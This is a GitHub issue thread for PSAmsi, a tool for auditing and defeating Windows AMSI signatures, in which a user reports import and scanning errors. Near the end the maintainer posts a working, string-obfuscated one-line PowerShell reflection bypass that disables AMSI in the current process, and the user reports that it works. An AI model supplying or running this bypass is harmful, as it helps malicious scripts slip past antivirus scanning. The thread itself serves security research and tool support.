search

cobbr / PSAmsi

PSAmsi is a tool for auditing and defeating AMSI signatures.
GNU General Public License v3.0
387 stars 71 forks source link

Error on WMF 5.1 #2

Closed CaledoniaProject closed 6 years ago

CaledoniaProject commented 6 years ago

I'm running PS 5.1 + DotNet 4.7 on WIndows 7 x86,

During module import it gives me the following error:

PS c:\test\PSAmsi-master> import-module .\PSAmsiClient.ps1
PS c:\test\PSAmsi-master> $Scanner = [PSAmsiScanner]::new()
AmsiInitialize : You cannot call a method on a null-valued expression.
At c:\test\PSAmsi-master\PSAmsiClient.ps1:1396 char:19
+ ...   $Result = AmsiInitialize -appName $this.PSAmsiScannerAppName -amsiC ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [AmsiInitialize], RuntimeE
   xception
    + FullyQualifiedErrorId : InvokeMethodOnNull,AmsiInitialize

Any ideas?

cobbr commented 6 years ago

Windows 7 does not support the AMSI. So PSAmsi will only work on Windows 10 & Server 2016.

I agree that there should be a better error message that makes this more clear. I'll leave this open until I add a more clear warning message.

CaledoniaProject commented 6 years ago

Yeah, Windows 2016 works for me.

GetPSAmsiScanResult does not seem to catch exceptions, your blog says it would simply return True or False, but I got an exception like this,

PS c:\PSAmsi-master> $Scanner.GetPSAmsiScanResult('Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect')
At line:1 char:1
+ $Scanner.GetPSAmsiScanResult('Add-Member NoteProperty -Name VirtualPr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

Was it a problem as well?

cobbr commented 6 years ago

This is a fun one :)

This isn't a result of GetPSAmsiScanResult catching exceptions or not catching exceptions. The line you are running is being detected as malicious by AMSI and is causing PSAmsi to not run at all. Of course, this is expected because you are trying to scan a known signature.

You have a few options here:

1) This is one of a few reasons that I implemented a client/server architecture. You could feed the contents to be scanned from the server side, so that the 'malicious' content doesn't appear in the client-side code. Details available on the wiki: https://github.com/cobbr/PSAmsi/wiki/Standalone-Client-Server-Architecture

  1. Write the 'malicious' contents to a file, and use the GetPSAmsiScanResult function that reads from a file: https://github.com/cobbr/PSAmsi/blob/master/PSAmsiClient.ps1#L1593 Downside here is that you might have to deal with file-based AV.

  2. Use the reflection-based AMSI bypass. Seems counter-intuitive, but you can use an AMSI bypass that will disable AMSI for the current PowerShell process. PSAmsi creates his own session w/ AMSI that will still work just fine even while AMSI has been bypassed within the PowerShell process. This is the AMSI bypass (credit to Matt Graeber for discovery):

[ref].Assembly.GetType('System.Management.A'+'utomation.Am'+'siUtils')."GetF`ield"('am'+'siInitF'+'ailed','NonP'+'ublic,S'+'tatic').SetValue($null,$true)

CaledoniaProject commented 6 years ago

Yeah, I like the 3rd solution, works like a charm 👍